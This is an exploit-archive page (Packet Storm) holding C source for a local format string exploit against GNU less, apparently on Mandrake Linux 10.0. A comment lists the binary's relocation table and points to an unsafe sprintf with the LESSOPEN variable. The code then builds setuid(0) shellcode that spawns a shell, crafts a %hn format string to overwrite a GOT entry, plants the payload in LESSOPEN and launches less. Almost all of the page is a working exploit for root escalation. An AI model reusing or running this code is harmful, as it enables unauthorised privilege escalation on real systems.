GNU less local exploit.
58a7a9a42bea20075104c3381ea5615bb56bb62a0b6c2d5e9eb359d26ba79dc6/* GNU LESS LOCAL FORMAT STRING EXPLOIT
/usr/bin/less: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0805fd98 R_386_GLOB_DAT __gmon_start__
0805fda0 R_386_COPY ospeed
0805fda2 R_386_COPY PC
0805fda4 R_386_COPY stdin
0805fc94 R_386_JUMP_SLOT fgetc
0805fc98 R_386_JUMP_SLOT tgetnum
0805fc9c R_386_JUMP_SLOT strchr
0805fca0 R_386_JUMP_SLOT getpid
0805fca4 R_386_JUMP_SLOT __ctype_tolower_loc
0805fca8 R_386_JUMP_SLOT tgoto
0805fcac R_386_JUMP_SLOT regexec
0805fcb0 R_386_JUMP_SLOT _longjmp
0805fcb4 R_386_JUMP_SLOT write
0805fcb8 R_386_JUMP_SLOT fileno
0805fcbc R_386_JUMP_SLOT strcmp
0805fcc0 R_386_JUMP_SLOT close
0805fcc4 R_386_JUMP_SLOT getenv
0805fcc8 R_386_JUMP_SLOT signal
0805fccc R_386_JUMP_SLOT regfree
0805fcd0 R_386_JUMP_SLOT pclose
0805fcd4 R_386_JUMP_SLOT tgetflag
0805fcd8 R_386_JUMP_SLOT strerror
0805fcdc R_386_JUMP_SLOT tcsetattr
0805fce0 R_386_JUMP_SLOT setlocale
0805fce4 R_386_JUMP_SLOT __errno_location
0805fce8 R_386_JUMP_SLOT system
0805fcec R_386_JUMP_SLOT popen
0805fcf0 R_386_JUMP_SLOT cfgetospeed
0805fcf4 R_386_JUMP_SLOT time
0805fcf8 R_386_JUMP_SLOT creat64
0805fcfc R_386_JUMP_SLOT tputs
0805fd00 R_386_JUMP_SLOT fgets
0805fd04 R_386_JUMP_SLOT strstr
0805fd08 R_386_JUMP_SLOT strlen
0805fd0c R_386_JUMP_SLOT sleep
0805fd10 R_386_JUMP_SLOT __strtol_internal
0805fd14 R_386_JUMP_SLOT lseek64
0805fd18 R_386_JUMP_SLOT strncmp
0805fd1c R_386_JUMP_SLOT __xstat64
0805fd20 R_386_JUMP_SLOT fsync
0805fd24 R_386_JUMP_SLOT __libc_start_main
0805fd28 R_386_JUMP_SLOT tgetent
0805fd2c R_386_JUMP_SLOT sigsetmask
0805fd30 R_386_JUMP_SLOT strcat
0805fd34 R_386_JUMP_SLOT printf
0805fd38 R_386_JUMP_SLOT memcpy
0805fd3c R_386_JUMP_SLOT open64
0805fd40 R_386_JUMP_SLOT fclose
0805fd44 R_386_JUMP_SLOT __ctype_toupper_loc
0805fd48 R_386_JUMP_SLOT fopen64
0805fd4c R_386_JUMP_SLOT regcomp
0805fd50 R_386_JUMP_SLOT exit
0805fd54 R_386_JUMP_SLOT calloc
0805fd58 R_386_JUMP_SLOT _IO_putc
0805fd5c R_386_JUMP_SLOT free
0805fd60 R_386_JUMP_SLOT ioctl
0805fd64 R_386_JUMP_SLOT isatty
0805fd68 R_386_JUMP_SLOT strncpy
0805fd6c R_386_JUMP_SLOT dup
0805fd70 R_386_JUMP_SLOT _setjmp
0805fd74 R_386_JUMP_SLOT kill
0805fd78 R_386_JUMP_SLOT sprintf <----------------------------
0805fd7c R_386_JUMP_SLOT _IO_getc
0805fd80 R_386_JUMP_SLOT __ctype_b_loc
0805fd84 R_386_JUMP_SLOT tgetstr
0805fd88 R_386_JUMP_SLOT tcgetattr
0805fd8c R_386_JUMP_SLOT read
0805fd90 R_386_JUMP_SLOT __fxstat64
0805fd94 R_386_JUMP_SLOT strcpy
EXAMPLE IN MANDRAKE LINUX 10.0 OR.
bug exists in filename.c
<<
sprintf(cmd, lessopen, filename);
>>
you can exploit it. to exploit u need to set LESSOPEN ENV. VAR.
and execute less with some filename (maybe non-existen).
*/
#include <stdio.h>
#include <string.h>
char buf[100];
char shellcode[] = // 1337 unl0ck team small shellcode with setuid(0) ;)
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
long getsp()
{
__asm__("movl %esp,%eax");
}
char *cfstr(long GOT, long RET, int ALIGN) {
long high,low;
memset(buf,0x00,sizeof(buf));
high = (RET >> 16) & 0xffff;
low = RET & 0xffff;
sprintf(buf,"%c%c%c%c%c%c%c%c%%.%dx%%%d$hn%%.%dx%%%d$hn",
(char)((GOT&0xff)+2),(char)((GOT>>8)&0xff),(char)((GOT>>16)&0xff),(char)((GOT>>24)&0xff),
(char)(GOT&0xff),(char)((GOT>>8)&0xff),(char)((GOT>>16)&0xff),(char)((GOT>>24)&0xff),
(high>low)?(low-8):(high-8),
(high>low)?(ALIGN+1):(ALIGN),
(high>low)?(high-low):(low-high),
(high>low)?(ALIGN):(ALIGN+1));
return buf;
}
int main(int argc, char **argv) {
long GOT;
long RET;
int ALIGN = 2,off=0;
char *less ,buff[100], exploit[1000];
char *enva, *genva;
less = (char *)malloc(1000);
enva = "LESSOPEN";
printf("[~] creating shellcode...\n");
sprintf(less, "LESSFUCK=");
memset(less + 4, 0x90, 1000-1-strlen(shellcode));
sprintf(less + 1000-1-strlen(shellcode), "%s", shellcode);
if(argc == 1)
{
printf("Usage: %s <OFFSET> <GOT>\n", argv[0]);
exit(0);
}
if(argc >= 2)
{
off = atoi(argv[1]);
RET = getsp() + off;
}
if(argc >= 3)
sscanf(argv[2], "0x%x", &GOT);
printf("[~] shellcode addr: 0x%x, OFFSET: %d, GOT: 0x%x\n",RET,off,GOT);
memset(buff, 0x00, sizeof(buf));
sprintf(buff, "%s", cfstr(GOT+4,RET,ALIGN));
printf("[~] creating exploit...\n");
sprintf(exploit, "%s%s", buff, less);
if ( setenv(enva, exploit, 1) == 0 ) printf("[+] var successfully set!\n");
if ( setenv(enva, exploit, 1) == -1 ) { printf("[-] failed! exiting...\n"); exit(0);}
//execl("/usr/bin/less", "/usr/bin/less", "-f", "a", NULL);
system("less -f a");
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed